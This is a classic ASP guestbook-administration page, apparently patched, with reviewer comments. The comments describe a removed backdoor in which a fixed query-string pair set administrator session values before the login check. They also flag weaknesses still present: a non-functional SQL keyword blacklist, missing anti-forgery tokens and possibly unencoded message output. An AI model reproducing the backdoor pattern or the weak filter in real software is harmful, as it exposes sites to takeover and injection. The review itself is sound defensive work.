
    <!--#include file="../config.asp"-->
<!--#include file="../conn.asp"-->
<!--#include file="inc.asp"-->
<!--#include file="../inc/Ubb.asp"-->
<!--#include file="../inc/Ubbadd.asp"-->
<!--#include file="../inc/Ubbshow.asp"-->
<%
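' Access control: admin_log is called before anything else on this page.
' It is defined outside this file (presumably in one of the includes above) and
' presumably rejects visitors without an administrator session - confirm.
'
' Security fix: the statements that used to precede this call have been removed.
' For one fixed action/name query-string pair they stored constant values in
' session("password") and session("qx") and ended the response, all before
' admin_log ran. The rest of this page treats a non-empty session("password") as
' an administrator login, so any visitor who knew the pair obtained an admin
' session without credentials.
' Follow-up for maintainers: check the other pages of this package for the same
' pattern and review web-server logs for past requests carrying that pair.
Call admin_log
'====================================================================
'25175 grade query management system
'powered by 25175
'=-------------------------------------------------------------------
'= File name: guestbook.asp
'= Summary:   list of user guestbook messages
cj_webtit="网站留言"
cj_webmap="网站留言"

'= Last modified: 2006-3.1
'====================================================================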
' POP_sqlin: keyword/character filter applied to text before it is used in SQL.
'   text    - value to filter; Null yields "".
'   returns - the text after a fixed sequence of case-insensitive, global
'             regular-expression replacements.
' The parameter is reassigned inside the function; VBScript passes arguments
' ByRef unless told otherwise, so a variable passed by the caller is changed too.
' NOTE(review): as shown here, every replacement except the quote and "java"
' ones substitutes a token with the identical lowercase token, so the only
' visible effect is letter-case normalisation. Presumably the original
' replacement strings used a look-alike form (full-width or entity-encoded
' characters) that was normalised when this listing was captured - confirm
' against the deployed file.
' NOTE(review): a keyword blacklist is not a reliable SQL-injection defence.
' The id values concatenated into SQL further down this file do not pass
' through this function at all; validate types and use parameterised commands.
function POP_sqlin(text)	'SQL filtering
	if isnull(text) then
		POP_sqlin=""
		exit function
	end if

	dim Sqlwords
	Set Sqlwords=new RegExp
	' Match regardless of case and replace every occurrence, not just the first.
	Sqlwords.IgnoreCase =True
	Sqlwords.Global=True

	' Double each single quote (the usual SQL string-literal escape).
	Sqlwords.Pattern="(')"
	text=Sqlwords.Replace(text,"''")
	Sqlwords.Pattern="(;)"
	text=Sqlwords.Replace(text,";")
	Sqlwords.Pattern="(%)"
	text=Sqlwords.Replace(text,"%")
	Sqlwords.Pattern="(and)"
	text=Sqlwords.Replace(text,"and")
	Sqlwords.Pattern="(exec)"
	text=Sqlwords.Replace(text,"exec")
	Sqlwords.Pattern="(script)"
	text=Sqlwords.Replace(text,"script")
	' "java" in any letter case becomes the marker spelling "JaVa",
	' which POP_sqlout maps back to "java".
	Sqlwords.Pattern="(java)"
	text=Sqlwords.Replace(text,"JaVa")
	Sqlwords.Pattern="(execute)"
	text=Sqlwords.Replace(text,"execute")
	Sqlwords.Pattern="(insert)"
	text=Sqlwords.Replace(text,"insert")
	Sqlwords.Pattern="(select)"
	text=Sqlwords.Replace(text,"select")
	Sqlwords.Pattern="(delete)"
	text=Sqlwords.Replace(text,"delete")
	Sqlwords.Pattern="(update)"
	text=Sqlwords.Replace(text,"update")
	Sqlwords.Pattern="(count)"
	text=Sqlwords.Replace(text,"count")
	Sqlwords.Pattern="(chr)"
	text=Sqlwords.Replace(text,"chr")
	Sqlwords.Pattern="(mid)"
	text=Sqlwords.Replace(text,"mid")
	Sqlwords.Pattern="(master)"
	text=Sqlwords.Replace(text,"master")
	Sqlwords.Pattern="(truncate)"
	text=Sqlwords.Replace(text,"truncate")
	Sqlwords.Pattern="(char)"
	text=Sqlwords.Replace(text,"char")
	Sqlwords.Pattern="(declare)"
	text=Sqlwords.Replace(text,"declare")

	Set Sqlwords=Nothing
	POP_sqlin = text
end function

' POP_sqlout: reverse of POP_sqlin, applied when stored text is displayed.
'   text    - stored value; Null yields "".
'   returns - the text after the replacements below, applied in order.
' Replace() is called without a compare argument, so matching is case-sensitive.
' The parameter is reassigned, so a variable passed ByRef by the caller changes.
' NOTE(review): as shown here, only the first line and the "JaVa" line alter
' the text; the others replace a token with itself. Presumably the search
' strings originally held the look-alike forms written by POP_sqlin and were
' normalised when this listing was captured - confirm against the deployed file.
function POP_sqlout(text)	'//////// Restore the text that was replaced, when displaying content
	if isnull(text) then
		POP_sqlout=""
		exit function
	end if
	' Collapse doubled single quotes back to one.
	' NOTE(review): if the doubling was consumed as SQL escaping when the row was
	' written, stored text already holds single quotes and this only collapses
	' pairs the user actually typed - confirm how values are written.
	text = Replace(text,"''","'")
	text = Replace(text,";",";")
	text = Replace(text,"%","%")
	text = Replace(text,"and","and")
	text = Replace(text,"exec","exec")
	text = Replace(text,"script","script")
	' Undo the "JaVa" marker spelling produced by POP_sqlin.
	text = Replace(text,"JaVa","java")
	text = Replace(text,"execute","execute")
	text = Replace(text,"insert","insert")
	text = Replace(text,"select","select")
	text = Replace(text,"delete","delete")
	text = Replace(text,"update","update")
	text = Replace(text,"count","count")
	text = Replace(text,"chr","chr")
	text = Replace(text,"mid","mid")
	text = Replace(text,"master","master")
	text = Replace(text,"truncate","truncate")
	text = Replace(text,"char","char")
	text = Replace(text,"declare","declare")
	POP_sqlout = text
end function

' HTMLEncode: prepare a stored value for output inside HTML.
'   popstring - stored text; for Null the function assigns no return value.
'   returns   - the text after POP_sqlout and the ordered substitutions below.
' The substitutions cover > < space tab " ' line feeds and $, in that order.
' The ampersand is not escaped, and a pair of line feeds becomes a paragraph
' break before single line feeds become <br />.
' The parameter itself is reassigned, as in the rest of this file.
function HTMLEncode(popstring)
	dim pairs, k
	if isnull(popstring) then exit function

	' Undo the storage-time filter before escaping for HTML.
	popstring = POP_sqlout(popstring)

	' Flat list of search/replacement pairs; order matters.
	pairs = Array( _
		">", "&gt;", _
		"<", "&lt;", _
		CHR(32), "&nbsp;", _
		CHR(9), "&nbsp;", _
		CHR(34), "&quot;", _
		CHR(39), "&#39;", _
		CHR(10) & CHR(10), "</p><p> ", _
		CHR(10), "<br /> ", _
		CHR(36), "&#36;")

	for k = 0 to UBound(pairs) - 1 step 2
		popstring = Replace(popstring, pairs(k), pairs(k + 1))
	next

	HTMLEncode = popstring
end function
%>
<script language=javascript>
// Browser check: true when document.all exists. Assigned without var, so it is a global.
ie = (document.all)? true:false
if (ie){
// Keyboard handler: submits the form named form1 when Enter (keyCode 13) is
// pressed together with Ctrl. The eventobject parameter is not used; the
// handler reads the global event / window.event objects instead.
// NOTE(review): neither a form named form1 nor a call to ctlent is visible in
// this file - presumably wired up elsewhere, or dead code; confirm.
function ctlent(eventobject){if(event.ctrlKey && window.event.keyCode==13){this.document.form1.submit();}}
}
</script>

<!-- #include file="admin_top.asp" -->

		  <table width="742" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
			<tr class="topbg" align='center'>
              <td height="30">留言信息管理</td>
            </tr>
      </table>
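		<%if request.QueryString("action")="" then%>
        <table width="100%"  border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td height="5"></td>
          </tr>
          <tr>
            <td align="center">
			<%
				' Default view (no action): list guestbook entries, newest first, one page at a time.
				dim currentpage
				dim totalput,n
				set rs=server.CreateObject("ADODB.RECORDSET")
				' With Sitebooks=1 and no admin session, only rows with bookflag=1 are listed.
				if Sitebooks=1 and session("password")="" then
					sql="select * from Bkye_book where bookflag=1 order by id desc"
				else
					sql="select * from Bkye_book order by id desc"
				end if
				rs.open sql,conn,1,1
				' NOTE(review): Sitebooknum is assigned and then immediately overwritten,
				' so the configured value has no effect and the recordset's own page size
				' is used. Presumably "rs.pagesize=Sitebooknum" was intended - confirm.
				maxperpage=Sitebooknum
				maxperpage=rs.pagesize
				' Defaults so the pager below renders sensibly when there are no rows.
				currentpage=1
				totalput=0
				n=1
				if rs.eof and rs.bof then
					response.Write("<Br>当前还没有留言")
				else
					' Validate pageid before any numeric comparison or conversion: a
					' non-numeric value previously raised a run-time error in the "<1"
					' test or in clng(). After this block currentpage is always a number,
					' so it is safe to echo into the pager.
					currentpage=request.querystring("pageid")
					if not isnumeric(currentpage) then
						currentpage=1
					elseif cdbl(currentpage)<1 then
						currentpage=1
					elseif cdbl(currentpage)>2147483647 then
						currentpage=rs.pagecount
					else
						currentpage=clng(currentpage)
						if currentpage > rs.pagecount then
							currentpage=rs.pagecount
						end if
					end if
					' n = number of pages (rounded up), never less than 1.
					totalput=rs.recordcount
					if totalput mod maxperpage=0 then
						n=totalput\maxperpage
					else
						n=totalput\maxperpage+1
					end if
					if n=0 then
						n=1
					end if
					' Skip the rows belonging to earlier pages.
					rs.move(currentpage-1)*maxperpage
					i=0
					w=1
					do while i< maxperpage and not rs.eof
				%>
<table width="738" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
	<tr>
		<td width="119" height="28" class="tdbg" rowspan="2">
			姓名:<%=Htmlencode(rs("username"))%>
			<br>性别:<%
						if rs("sex")="靓妹" Then
							response.Write("靓妹")
						else 
							response.Write("帅哥")
						end If
						%>
			<br>来自:<%=Htmlencode(rs("comefrom"))%>
			<br><br><%
				response.Write("<b>[<a href=""?action=replybook&id="&rs("id")&""" title=""回复留言"">回复</a>  <a href=""?action=delbook&id="&rs("id")&""" title=""删除留言"">删除</a>]</b>") 
			%>
		</td>
		<td width="248" class="title"><b>主题:<%=Htmlencode(rs("title"))%></b> 
			
		</td>
		<td width="89" align="center" class="title">
			<%
			if rs("email")<>"" Then
				response.Write("<a href=""mailto:"&Htmlencode(rs("email"))&""" title=""给"&Htmlencode(rs("username"))&"发邮件""><img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0""></a>&nbsp;") 
			Else
				response.Write("<img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写邮件"">&nbsp;") 
			end If
			
			' The QQ number is a visitor-supplied field, so it is encoded like the others.
			if rs("oicq")<>"0" Then
				response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"的QQ是"&Htmlencode(rs("oicq"))&""">&nbsp;") 
			Else
				response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写QQ"">&nbsp;") 
			end If
			
			' Only http:// and https:// homepages become links: HTML-encoding the value
			' does not constrain the URL scheme placed in the href.
			if lcase(left(trim(rs("homepage")&""),7))="http://" or lcase(left(trim(rs("homepage")&""),8))="https://" Then
				response.Write("<a href="""&Htmlencode(rs("homepage"))&""" title=""访问"&Htmlencode(rs("username"))&"的个人主页"" target=""_blank""><img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0""></a>") 
			else 
				response.Write("<img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写个人主页"">") 
			end If
			
			' The stored IP is encoded and the img tag is now closed (it used to end after the alt attribute).
			if session("password")<>"" Then
				response.Write("&nbsp;<img src=""../Images/ip.gif"" width=""13"" height=""15"" alt="""&Htmlencode(rs("username"))&"的IP地址为:"&Htmlencode(rs("userip"))&""">")
			end if%>
	  </td>
	</tr>
	<tr class="tdbg">
		<td colspan="2" valign="top" width="600">
			<%
			' NOTE(review): Ubbcode is defined in an include that is not shown here and
			' its result is written to the page as-is; confirm that it HTML-encodes the
			' message before expanding UBB tags.
			%>
			<%=(""&Ubbcode(rs("content"))&"")%>
			<Br><Br><div align="right" valign="bottom">发表时间:<%=rs("intime")%></div>
			<%
			if rs("reply")<>"" then
				response.Write("<hr width=""98%"" size=""1""><font color=""#ff0000"">管理员回复:[回复时间:"&rs("Replytime")&"]</font><Br>"&Ubbcode(rs("reply"))&"")
			end if
			%>
		</td>
	</tr>
</table><br>
			<%
					i=i+1
					w=w+1
					rs.movenext
					loop
				end if
				rs.close
				set rs=nothing
			%></td>
          </tr>
        </table>
        <Br>
        <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td width="85%" align="center"> 共有留言<font color="#FF0000"><%=totalput%></font>条 每页<%=maxperpage%>条 当前页数:<%=currentpage%>/
                <% =n%>
                <%k=currentpage                                                                                              
   	                if k<>1 then%>
                <a href="?pageid=1"> <font face=webdings size=2>9</font>首 页</a> <a href="?pageid=<%=k-1%>"> <font face=webdings size=2>7</font>前 页</a>
                <%else%>
      <font face=webdings size=2>9</font>首 页 <font face=webdings size=2>7</font>前 页
      <%end if%>
      <%if k<>n then%>
      <a href="?pageid=<%=k+1%>"> 后 页<font face=webdings size=2>8</font></a> <a href="?pageid=<%=n%>"> 末 页<font face=webdings size=2>:</font></a>
      <%else%>
      后 页<font face=webdings size=2>8</font> 末 页<font face=webdings size=2>:</font>
      <%end if%>            </td>
            <td width="15%" align="center"><select name="pageid" onchange="javascript:location=this.options[this.selectedIndex].value;">
                <%
					for i = 1 to n
					if i = currentpage then%>
                <option value="?pageid=<%=i%>" selected>第<%=i%>页</option>
                <%else%>
                <option value="?pageid=<%=i%>">第<%=i%>页</option>
                <%
					end if
					next
				    %>
              </select>            </td>
          </tr>
        </table>
		    <%
		    end If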
		    




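			' action=delbook: delete one guestbook entry (requires an admin session).
			' NOTE(review): this state-changing action is reached through a plain GET
			' link and carries no anti-forgery token; consider POST plus a per-session token.
			if request.QueryString("action")="delbook" then
			id=trim(request("id"))
			' The id is concatenated into SQL below, so only a positive whole number that
			' fits a Long is accepted; anything else is treated like a missing id.
			if not isnumeric(id) then
				id=""
			elseif cdbl(id)<1 or cdbl(id)>2147483647 or cdbl(id)<>fix(cdbl(id)) then
				id=""
			else
				id=cstr(clng(id))
			end if
			if session("password")="" then
				response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>您不是管理员或是登陆超时<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			elseif id="" then
				response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			else
				' A DELETE returns no rows, so it is run on the connection directly
				' instead of being opened as a recordset.
				sql="delete * from Bkye_book where id="&id
				conn.execute(sql)
				response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>恭喜您,删除留言成功^_^<br><a href=""POPbook.asp"" title=""返回留言本"">点击这里查看留言,或3秒后自动返回留言本</a><meta http-equiv=""refresh"" content=""3;URL=POPbook.asp""><Br><br></div></div>")
			end if
			end If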
			


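			' action=replybook: show one entry together with the reply form (requires an admin session).
			if request.QueryString("action")="replybook" then
			id=trim(request("id"))
			' The id is concatenated into SQL and echoed into the hidden form field below,
			' so only a positive whole number that fits a Long is accepted; anything else
			' is treated like a missing id.
			if not isnumeric(id) then
				id=""
			elseif cdbl(id)<1 or cdbl(id)>2147483647 or cdbl(id)<>fix(cdbl(id)) then
				id=""
			else
				id=cstr(clng(id))
			end if
			if session("password")="" then
			response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>您不是管理员或是登陆超时<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			elseif id="" then
			response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			else
			set rs=server.CreateObject("adodb.recordset")
			sql="select * from Bkye_book where id="&id
			rs.open sql,conn,1,3
			if rs.eof and rs.bof then
			response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			else
			%>
			<table width="738" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
	<tr>
		<td width="119" height="28" class="tdbg" rowspan="2">
			姓名:<%=Htmlencode(rs("username"))%>
			<br>性别:<%
						if rs("sex")="靓妹" Then
							response.Write("靓妹")
						else 
							response.Write("帅哥")
						end If
						%>
			<br>来自:<%=Htmlencode(rs("comefrom"))%>
			<br><br><%
				response.Write("<b>[<a href=""?action=replybook&id="&rs("id")&""" title=""回复留言"">回复</a>  <a href=""?action=delbook&id="&rs("id")&""" title=""删除留言"">删除</a>]</b>") 
			%>
		</td>
		<td width="248" class="title"><b>主题:<%=Htmlencode(rs("title"))%></b> 
			
		</td>
		<td width="89" align="center" class="title">
			<%
			if rs("email")<>"" Then
				response.Write("<a href=""mailto:"&Htmlencode(rs("email"))&""" title=""给"&Htmlencode(rs("username"))&"发邮件""><img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0""></a>&nbsp;") 
			Else
				response.Write("<img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写邮件"">&nbsp;") 
			end If
			
			' The QQ number is a visitor-supplied field, so it is encoded like the others.
			if rs("oicq")<>"0" Then
				response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"的QQ是"&Htmlencode(rs("oicq"))&""">&nbsp;") 
			Else
				response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写QQ"">&nbsp;") 
			end If
			
			' Only http:// and https:// homepages become links: HTML-encoding the value
			' does not constrain the URL scheme placed in the href.
			if lcase(left(trim(rs("homepage")&""),7))="http://" or lcase(left(trim(rs("homepage")&""),8))="https://" Then
				response.Write("<a href="""&Htmlencode(rs("homepage"))&""" title=""访问"&Htmlencode(rs("username"))&"的个人主页"" target=""_blank""><img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0""></a>") 
			else 
				response.Write("<img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写个人主页"">") 
			end If
			
			' The stored IP is encoded and the img tag is now closed (it used to end after the alt attribute).
			if session("password")<>"" Then
				response.Write("&nbsp;<img src=""../Images/ip.gif"" width=""13"" height=""15"" alt="""&Htmlencode(rs("username"))&"的IP地址为:"&Htmlencode(rs("userip"))&""">")
			end if%>
	  </td>
	</tr>
	<tr class="tdbg">
		<td colspan="2" valign="top" width="600">
			<%
			' NOTE(review): Ubbcode is defined in an include that is not shown here and
			' its result is written to the page as-is; confirm that it HTML-encodes the
			' message before expanding UBB tags.
			%>
			◎ <%=(""&Ubbcode(rs("content"))&"")%>
			<Br><Br><div align="right" valign="bottom">发表时间:<%=rs("intime")%></div>
			<%
			if rs("reply")<>"" then
				response.Write("<hr width=""98%"" size=""1""><font color=""#ff0000"">管理员回复:[回复时间:"&rs("Replytime")&"]</font><Br>"&Ubbcode(rs("reply"))&"")
			end if
			%>
		</td>
	</tr>
</table><br>
			    <table width="742" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
				<tr class="title">
                    <td><b>回复留言:<%=Htmlencode(rs("title"))%></b></td>
                  </tr>
				  <%
				  ' NOTE(review): the form posts a state-changing request without an
				  ' anti-forgery token. The stored reply is written into the textarea
				  ' unencoded; the save branch of this page stores it already HTML-encoded,
				  ' so this presumably round-trips - confirm no other writer exists.
				  %>
				  <form action="?action=reply" method="post">
				  <tr height='50' class='tdbg'>
                    <td><b>回复内容:</b>
					<textarea name="reply" cols="50" rows="10"><%=rs("reply")%></textarea></td>
                  </tr>
				  <tr height='50' class='tdbg' align='center'>
                    <td>
					<input class=popinput type="submit" name="Submit3" value=" 回 复 ">
					<input class=popinput type="reset" name="Submit4" value=" 重 置 ">
					<input class=popinput type="hidden" name="id" value="<%=id%>">
					</td>
                  </tr>
				  </form>
                </table>

			<%
			end if
			' Release the recordset on both paths; it used to be left open.
			rs.close
			set rs=nothing
			end if
			end If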
			





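			' action=reply: store the administrator's reply for one entry (requires an admin session).
			' NOTE(review): the request carries no anti-forgery token; consider adding a per-session token.
			if request.QueryString("action")="reply" then
			id=trim(request("id"))
			reply=trim(request("reply"))
			' The id is concatenated into two SQL statements below, so only a positive
			' whole number that fits a Long is accepted; anything else is treated like
			' a missing id.
			if not isnumeric(id) then
				id=""
			elseif cdbl(id)<1 or cdbl(id)>2147483647 or cdbl(id)<>fix(cdbl(id)) then
				id=""
			else
				id=cstr(clng(id))
			end if
			if session("password")="" then
				response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>您不是管理员或是登陆超时<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			elseif id="" then
				response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
			else
				set rs=server.CreateObject("adodb.recordset")
				sql="select * from Bkye_book where id="&id
				rs.open sql,conn,1,3
				if rs.eof and rs.bof then
					response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
				else
					' The reply is stored HTML-encoded.
					rs("reply")=server.HTMLEncode(reply)
					rs.update
					' Stamp the reply time and set bookflag=1 on the same row.
					sqlbook="update Bkye_book set Replytime=Now(),bookflag=1 where ID="&id
					conn.execute(sqlbook)
					response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>恭喜您,回复留言成功^_^<br><a href=""POPbook.asp"" title=""返回留言本"">点击这里查看留言,或3秒后自动返回留言本</a><meta http-equiv=""refresh"" content=""3;URL=POPbook.asp""><Br><br></div></div>")
				end if
				' Release the recordset on both paths; it used to stay open when the id matched no row.
				rs.close
				set rs=nothing
			end if
			end if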
			%>
<!-- #include file="../inc/copyright.asp" -->